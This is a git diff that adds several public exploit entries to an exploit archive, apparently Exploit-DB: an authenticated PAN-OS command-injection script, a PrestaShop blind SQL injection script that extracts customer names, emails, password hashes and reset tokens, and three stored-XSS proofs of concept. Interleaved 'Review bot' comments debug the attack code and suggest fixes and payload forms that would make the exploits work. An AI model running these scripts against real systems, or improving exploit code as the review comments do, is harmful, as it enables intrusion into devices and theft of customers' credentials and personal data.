diff --git a/exploits/multiple/remote/51005.py b/exploits/multiple/remote/51005.py
new file mode 100755
index 000000000..45ba9b1fe
--- /dev/null
+++ b/exploits/multiple/remote/51005.py
@@ -0,0 +1,88 @@
+# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-08-13
+# Exploit Author: UnD3sc0n0c1d0
+# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
+# Category: Web Application
+# Version: <10.0.1, <9.1.4 and <9.0.10
+# Tested on: PAN-OS 10.0 - Parrot OS
+# CVE : CVE-2020-2038
+#
+# Description:
+# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
+# administrators to execute arbitrary OS commands with root privileges.
+# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.
+
+#!/usr/bin/env python3
+
+import requests
+import urllib3
+import sys
+import getopt
+import xmltodict
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def banner():
+ print('\n###########################################################################')
+ print('# Proof of Concept for CVE-2020-2038 #')
+ print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #')
+ print('# Positive Technologies #')
+ print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
+ print('# #')
+ print('# Exploit by: Juampa RodrÃguez (@UnD3sc0n0c1d0) #')
+ print('###########################################################################')
+
+def exploit(target,user,password,command):
+ apiparam = {'type': 'keygen', 'user': user, 'password': password}
+ apiresponse = requests.get(target+'api/', params=apiparam, verify=False)
+ xmlparse = xmltodict.parse(apiresponse.content)
+ apikey = xmlparse['response']['result']['key']
+ payload = '8.8.8.81111'
+ parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
+ response = requests.get(target+'api', params=parameters, verify=False)
+ print(response.text[50:-20])
+
+def usage():
+ print('\nusage: CVE-2020-2038.py\n\n')
+ print('arguments:')
+ print(' -h show this help message and exit')
+ print(' -t target URL (ex: http://vulnerable.host/)')
+ print(' -u target administrator user')
+ print(' -p pasword of the defined user account')
+ print(' -c command you want to execute on the target\n')
+
+def main(argv):
+ if len(sys.argv) < 9:
+ banner()
+ usage()
+ sys.exit()
+ try:
+ opts, args = getopt.getopt(argv,"ht:u:p:c:")
+ except getopt.GetoptError:
+ banner()
+ usage()
+ sys.exit()
+ for opt, arg in opts:
+ if opt == '-h':
+ usage()
+ sys.exit()
+ if opt == '-t':
+ target = arg
+ if opt == '-u':
+ user = arg
+ if opt == '-p':
+ password = arg
+ if opt == '-c':
+ command = arg
+ banner()
+ exploit(target,user,password,command)
+ sys.exit()
+
+if __name__ == "__main__":
+ try:
+ main(sys.argv[1:])
+ except KeyboardInterrupt:
+ print('Interrupted by users...')
+ except:
+ sys.exit()
\ No newline at end of file
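Review bot: The `command` argument parsed by `-c` is never used — `exploit()` sends the hard-coded `payload = '8.8.8.81111'` and ignores its `command` parameter, so the script cannot execute the caller's command (the payload string also looks truncated in this copy, presumably an op-command body from which markup was stripped; restore it and interpolate `command` into it). `apikey = xmlparse['response']['result']['key']` assumes keygen succeeded: with a wrong password the lookup raises KeyError, which the bare `except:` in the `__main__` block turns into a silent exit with no message, so check the response's status before indexing and replace the bare handler with `except Exception as e: sys.exit(f'error: {e}')`. The two requests also build the URL differently (`target+'api/'` vs `target+'api'`) and both require `-t` to end with `/`; normalise once with `target = target.rstrip('/') + '/api/'`. Finally, the `#!/usr/bin/env python3` shebang sits on line 22 after the header comment, so it has no effect even though the file is mode 100755 — move it to the first line.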
diff --git a/exploits/multiple/webapps/51003.txt b/exploits/multiple/webapps/51003.txt
new file mode 100644
index 000000000..bca44ddde
--- /dev/null
+++ b/exploits/multiple/webapps/51003.txt
@@ -0,0 +1,18 @@
+# Exploit Title: ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# CVE : CVE-2021-42750
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the name e.g
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
\ No newline at end of file
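Review bot: Step 2 ends with `e.g` and no payload — the example appears to have been stripped from this copy, so the PoC cannot be reproduced from the steps alone; spell it out in a form that survives rendering, e.g. `2. Put a javascript payload within the name, e.g. an <img> tag with an onerror handler calling alert()`. The steps also imply an authenticated account that is allowed to edit rule chains (and that the payload fires for any user who later hovers the node in the editor); stating both prerequisites explicitly would make the impact of this stored XSS clear.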
diff --git a/exploits/multiple/webapps/51004.txt b/exploits/multiple/webapps/51004.txt
new file mode 100644
index 000000000..8b06b66bc
--- /dev/null
+++ b/exploits/multiple/webapps/51004.txt
@@ -0,0 +1,19 @@
+# Exploit Title: ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# Tested on: [relevant os]
+# CVE : CVE-2021-42751
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the description of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the description e.g
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
\ No newline at end of file
diff --git a/exploits/php/webapps/51001.py b/exploits/php/webapps/51001.py
new file mode 100755
index 000000000..e88f56769
--- /dev/null
+++ b/exploits/php/webapps/51001.py
@@ -0,0 +1,239 @@
+# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
+# Date: 29/07/22
+# Exploit Author: Karthik UJ (@5up3r541y4n)
+# Vendor Homepage: https://www.prestashop.com/en
+# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
+# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
+# Version (blockwishlist): 2.1.0
+# Version (prestashop): 1.7.8.1
+# Tested on: Linux
+# CVE: CVE-2022-31101
+
+
+# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop
+
+import requests
+
+url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
+cookie = input("Enter cookie value:\n")
+
+header = {
+ "Cookie": cookie
+}
+
+# Define static stuff
+param = "&order="
+staticStart = "p.name, (select case when ("
+staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
+charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
+charset = list(charset)
+emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
+emailCharset = list(emailCharset)
+
+
+# Query current database name length
+print("\nFinding db name's length:")
+for length in range(1, 65):
+ condition = "LENGTH(database())=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ dbLength=length
+ print("Length: ", length, end='')
+ print("\n")
+ break
+
+print("Enumerating current database name:")
+databaseName = ''
+for i in range(1, dbLength+1):
+ for char in charset:
+ condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
+ fullUrl = url + param + staticStart + condition + staticEnd
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ databaseName += char
+ break
+print()
+
+# Enumerate any table
+prefix = "ps_"
+tableName = prefix + "customer"
+staticStart = "p.name, (select case when ("
+staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
+staticEnd2 = "); -- .asc"
+
+print("\nEnumerating " + tableName + " table")
+
+for id in range(1, 10):
+
+ condition = "id_customer=" + str(id)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ print("\nOnly " + str(id - 1) + " records found. Exiting...")
+ break
+ except requests.exceptions.Timeout:
+ pass
+
+ print("\nid = " + str(id))
+
+ # Finding firstname length
+ for length in range(0, 100):
+ condition = "LENGTH(firstname)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ firstnameLength=length
+ print("Firstname length: ", length, end='')
+ print()
+ break
+
+
+ # Enumerate firstname
+ firstname = ''
+ print("Firstname: ", end='')
+ for i in range(1, length+1):
+ for char in charset:
+ condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ firstname += char
+ break
+ print()
+
+ # Finding lastname length
+ for length in range(1, 100):
+ condition = "LENGTH(lastname)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ lastnameLength=length
+ print("Lastname length: ", length, end='')
+ print()
+ break
+
+ # Enumerate lastname
+ lastname = ''
+ print("Lastname: ", end='')
+ for i in range(1, length+1):
+ for char in charset:
+ condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ firstname += char
+ break
+ print()
+
+ # Finding email length
+ for length in range(1, 320):
+ condition = "LENGTH(email)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ emailLength=length
+ print("Email length: ", length, end='')
+ print()
+ break
+
+ # Enumerate email
+ email = ''
+ print("Email: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ email += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ email += char
+ break
+ print()
+
+ # Finding password hash length
+ for length in range(1, 500):
+ condition = "LENGTH(passwd)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ passwordHashLength=length
+ print("Password hash length: ", length, end='')
+ print()
+ break
+
+ # Enumerate password hash
+ passwordHash = ''
+ print("Password hash: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ passwordHash += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ passwordHash += char
+ break
+ print()
+
+ # Finding password reset token length
+ for length in range(0, 500):
+ condition = "LENGTH(reset_password_token)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ passwordResetTokenLength=length
+ print("Password reset token length: ", length, end='')
+ print()
+ break
+
+ # Enumerate password reset token
+ passwordResetToken = ''
+ print("Password reset token: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ passwordResetToken += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ passwordResetToken += char
+ break
+ print()
\ No newline at end of file
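Review bot: Under `# Enumerate lastname` the matched character is appended to the wrong accumulator — `firstname += char` should be `lastname += char`, so `lastname` stays empty and `firstname` silently absorbs the lastname's characters (only the printed output is right). The conditions are also concatenated raw into the query string, so `#` in the charsets turns the rest of the URL into a fragment that requests drops, `&` starts a new parameter, `+` is decoded as a space and a bare `'` breaks the SQL literal; none of those characters can ever match, and a position holding one falls through to the status-500 fallback that assumes `.`. Build the value with `urllib.parse.quote(condition, safe='')` (or pass `params={'order': ...}`) before sending. Finally, each enumeration loop uses the leftover loop variable `length` (e.g. `for i in range(1, length+1)`) instead of the `firstnameLength`/`lastnameLength`/`emailLength` value it just recorded, so when no length matched it enumerates up to 99, 319 or 499 positions of a field whose length was never established; use the recorded variable and skip the field when it is unset.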
diff --git a/exploits/php/webapps/51002.txt b/exploits/php/webapps/51002.txt
new file mode 100644
index 000000000..07629098f
--- /dev/null
+++ b/exploits/php/webapps/51002.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
+# Date: 02-08-2022
+# Exploit Author: Shivam Singh
+# Vendor Homepage: https://feehi.com/
+# Software Link: https://github.com/liufee/cms
+#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
+# Version: 2.1.1 (REQUIRED)
+# Tested on: Linux, Windows, Docker
+# CVE : CVE-2022-34140
+
+
+# Proof of Concept:
+1-Sing-up https://localhost.cms.feehi/
+2-Inject The XSS Payload in Username:
+"> fill all required fields and
+click the SignUp button
+3-Login to Your Account, Go to any article page then XSS will trigger.
\ No newline at end of file
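Review bot: The payload in step 2 is truncated to `">` — whatever followed (the injected tag) was stripped from this copy, so the PoC is not reproducible as written; give the payload in a rendering-safe form, e.g. `"> followed by an <img> tag with an onerror handler calling alert()`. As written, step 3 only shows the payload firing for the account that registered it; to substantiate "stored" rather than self-XSS, state where the username is rendered to other users (article comments, author line, etc.). Also `1-Sing-up` should read `1-Sign-up`, and `https://localhost.cms.feehi/` looks like a local test hostname rather than a real URL — say so or use a placeholder like `http://<target>/`.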
diff --git a/files_exploits.csv b/files_exploits.csv
index c390338f5..058e5a4ef 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18721,6 +18721,7 @@ id,file,description,date,author,type,platform,port
50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
+51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45062,3 +45063,7 @@ id,file,description,date,author,type,platform,port
50995,exploits/php/webapps/50995.py,"mPDF 7.0 - Local File Inclusion",1970-01-01,"Musyoka Ian",webapps,php,
50997,exploits/php/webapps/50997.py,"NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,p1ckzi,webapps,php,
50998,exploits/linux/webapps/50998.py,"Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Emir Polat",webapps,linux,
+51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",1970-01-01,"Karthik UJ",webapps,php,
+51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
+51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
+51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,